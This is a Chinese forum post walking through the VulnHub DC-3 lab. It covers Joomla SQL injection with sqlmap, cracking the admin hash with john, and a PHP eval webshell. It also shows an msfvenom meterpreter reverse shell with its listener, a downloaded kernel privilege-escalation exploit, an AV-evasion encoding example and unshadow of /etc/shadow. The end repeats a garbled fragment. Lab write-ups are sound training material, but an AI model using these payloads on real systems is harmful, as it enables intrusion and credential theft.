首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[原创]小蜘蛛带你一起学习DC-3
发表于: 2021-2-20 12:31 5212

[原创]小蜘蛛带你一起学习DC-3

安全小蜘蛛 活跃值
2021-2-20 12:31
5212

Vunlnhub靶机DC-3

 

*注:请严格遵守网络安全法,本文章以培养网络安全人才为核心。

 

目录
DC-3 靶机实战(DC-)

DC-3 靶机

信息收集

1
masscan -p80,8000-8100 10.0.0.0/8 --rate=10000

使用nmap进行精细扫描

1
nmap -p80 -sV -T4 192.168.195.135

查看cms
在这里插入图片描述
joomla!是一套全球知名的内容管理系统

工具joomscan

针对joomla的漏洞扫描程序(OWASP组织开发) 它不仅可以检测已知的攻击性漏洞,还能够检测到许多错误配置和管理员级别的缺陷,这些缺陷可被攻击者利用来破坏系统。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
选项
--url | -u <URL>                |   要扫描的Joomla URL/域名。
--enumerate-components | -ec    |   尝试枚举组件。
 
--cookie <String>               |   设置cookie。
--user-agent | -a <User-Agent>  |   使用指定的User-Agent。
--random-agent | -r             |   使用随机的用户代理
--timeout <Time-Out>            |   设置超时。
--proxy=PROXY                   |   使用代理连接到目标URL
           Proxy example: --proxy http://127.0.0.1:8080
                                  https://127.0.0.1:443
                                  socks://127.0.0.1:414
 
OWASP JoomScan包含在Kali Linux发行版中,我们可以直接下载!                                
 
apt-get install joomscan             #安装joomscan工具
 
joomscan -u http://192.168.195.135       #尝试对站点枚举组件

我们扫描出了很多有用的信息(下一个阶段我们可以加以利用)
在这里插入图片描述

查找joomla版本漏洞

1
searchsploit Joomla 3.7.0

在这里插入图片描述

1
ls /usr/share/exploitdb/exploits/php/webapps/42033.txt #我们看一下这个漏洞存放的位置

拿到这个漏洞文件

1
searchsploit -m 42033 把匹配的漏洞代码拷备一份到当前目录

打开这个文件

1
vi 42033.txt

在这里插入图片描述

SQL注入

工具sqlmap

是一个开源的SQL自动注入工具

 

http://sqlmap.org/

1
2
3
4
5
6
7
8
9
sqlmap -u "http://192.168.195.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
 
--dbs         #枚举数据库
-D joomladb #指定枚举的数据库
--tables    #枚举数据库中的表
-T            #指定枚举的表
--columns    #枚举表中的字段(列)
-C            #username,password            DBMS database table colunmn(s) to enumerate
--dump        #获取信息

在这里插入图片描述

获取joomladb数据库的表

1
2
3
4
sqlmap -u "http://192.168.195.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -D joomladb --tables -p list[fullordering]
 
-D joomladb #指定枚举的数据库
--tables    #枚举数据库中的表

在这里插入图片描述
​ 成果 #_users

爆出数据库指定表中(__users )的字段

数据库--》表---字段---关键字符的信息(用户名,密码等)进行dump(获取)

1
2
3
4
sqlmap -u "http://192.168.195.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -D joomladb --tables -T"#__user" --columns -p list[fullordering]
 
--columns    #枚举表中的字段(列)
#枚举表出现特殊字符所以加了双引号

在这里插入图片描述

获取指定字段的信息

1
2
3
4
sqlmap -u "http://192.168.195.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs  -D joomladb  --tables -T "#__users"  --columns  -C username,password --dump -p list[fullordering]
 
-C            #username,password            DBMS database table colunmn(s) to enumerate
--dump        #获取信息

失败可能是因为版本问题,系统更新可解决在这里插入图片描述

1
admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

工具 john

john the ripper

 

快速的密码破解工具,支持主流的操作系统密码破解,常用于检查系统有无弱口令

1
2
3
4
5
6
7
8
9
10
11
12
13
which john            #我们看看kali中有没有john
 
文件解析:
password.lst----默认的口令字典文件的位置
john---主程序
john.config--配置文件
find / -name password.lst        #查看字典文件位置
 
echo 'admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > dc-3.txt
john dc-3.txt    #使用john破解
 
#显示破解的密码
./john --show dc-3.txt

在这里插入图片描述

登录后台页面

1
2
http://192.168.195.135/administrator
随后输入登录口令

上传木马

在这里插入图片描述
在这里插入图片描述

我们可以在这里上传木马

 

在这里插入图片描述
在这里插入图片描述

文件名为yjh.php 文件类型为php

上传一句话木马

在这里插入图片描述

1
2
3
4
777
<?php
@eval($_REQUEST{777})
?>

链接蚁剑!

在这里插入图片描述尝试点击木马使其生效
在这里插入图片描述将URL地址添加其中(密码为777)
在这里插入图片描述生成木马

1
2
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.192.10 LPROT = 4444 -f raw -o shell.php //LHOST 替换自己的ip
复制shell.php 里的内容到图片位置后点击标定位置

将生成的木马扔到蚁剑里(偷偷告诉你特别方便)
在这里插入图片描述msf监听

1
2
3
4
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.10.128
run
激活木马
1
访问 http://192.168.192.130/templates/beez3/dc-3-shell.php

在这里插入图片描述

随后就有了msf中就有了反弹过来的shell

1
2
shell
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

提权

1
2
3
shell
lsb_release -//查看发行版本
uname -//查看内核版本

在这里插入图片描述

1
searchsploit ubuntu 16.04   //查找漏洞,测试后发现就这个好用

在这里插入图片描述

1
searchsploit -p 39772  //查看描述

在这里插入图片描述

1
2
less /usr/share/exploitdb/exploits/linux/local/39772.txt  //查漏洞文件
发现使用方法

查找exp下载地址
在这里插入图片描述

1
2
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip //下载利用工具
发现无法下载

在这里插入图片描述访问GitHub后发现项目合并访问地址发生改变

1
https://github.com/offensive-security/exploitdb-bin-sploits
1
访问 https://github.com/offensive-security/exploitdb 后找到解决办法
1
2
3
4
操作后发现会把GitHub上的漏洞利用工具下载到本地
/usr/share/exploitdb-bin-sploits/bin-sploits/
39772.zip 在本教程同目录下打包
upload /root/39772.zip  ./ //上传漏洞利用工具
1
2
3
unzip 39772.zip  #解压
cd 39772
tar -vxf exploit.tar

在这里插入图片描述

1
2
cd /root/ 进入root用户
cat the-flag.txt    #查看flag

在这里插入图片描述

扩展知识

SQL注入(SQLi)允许攻击者直接将一系列恶意的SQL查询代码插入后端数据库服务器。

 

这个漏洞允许攻击者通过添加,删除,修改和检索数据库中的条目来操作记录。

 

表(Table)

 

​ 一个数据库由多张表组成

 

列(conlumns或称为字段)

 

一个表中有多条记录,那么表的结构是是由多个字段描述定义的

1
2
grep zwzs /usr/share/john/password.lst       #在字典文件中看看有没有这个口令
echo "zwzs" >> /usr/share/john/password.lst #在字典文件中添加口令

msfvenom详解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
-p payload设置
-e 编码设置
-a 系统结构,默认x86
-s payload最大大小
-i 编码次数
-f 生成文件格式
 
另外几个命令:
平台查看: msfvenom --help-platforms
指定目标平台:--platform xxx
格式查看: msfvenom --help-formats
查看payload设置: msfvenom -p <payload name> --payload-options(可以发现该payload适合的平台等很多详细信息)
注意:如果要创建x64的负载需使用-a x64
 
正确生成免杀文件:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -f exe >1.exe
如果需要生成后门文件,需要加上lhost(本地主机ip)以及lport(本地主机开放的端口)参数。

小实验!

工具unshadow

合并账号和密码文件

1
2
3
4
5
6
/usr/sbin/unshadow
 
unshadou -comblines passwd and shadow files    //合并账号和密码文件
--wordlist        指定字典文件,如没有指定,则为默认密码字典文件
 
unshadow /etc/passwd /etc/shadow > mypassword.txt

开始

创建一个测试账号

1
echo "123" | passwd --stdin test

unshadow 合并

1
unshadow /etc/passwd /etc/shadow > myaccount.txt

随后john就不需要直接指定账号和密码文件了,直接使用合并后的

1
2
3
john myaccount.txt
 
./john --show mypassword.txt #显示破解出的密码

blines passwd and shadow files //合并账号和密码文件
--wordlist 指定字典文件,如没有指定,则为默认密码字典文件

 

unshadow /etc/passwd /etc/shadow > mypassword.txt

1
2
3
4
5
6
## 开始
 
### 创建一个测试账号
 
```bash
echo "123" | passwd --stdin test

unshadow 合并

1
unshadow /etc/passwd /etc/shadow > myaccount.txt

随后john就不需要直接指定账号和密码文件了,直接使用合并后的

1
2
3
john myaccount.txt
 
./john --show mypassword.txt #显示破解出的密码

[课程]Android-CTF解题方法汇总!

最后于 2021-2-23 20:13 被安全小蜘蛛编辑 ,原因:
收藏
免费 1
支持
分享
最新回复 (2)
wasdzjh
雪    币: 1634
活跃值: (480)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
感谢大佬的文章,求中国蚁剑的链接地址。我没有
2021-2-22 19:26
0
安全小蜘蛛
雪    币: 617
活跃值: (1331)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
私信
3
wasdzjh 感谢大佬的文章,求中国蚁剑的链接地址。我没有

发给你了

最后于 2021-2-23 18:51 被安全小蜘蛛编辑 ,原因:
2021-2-23 12:53
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//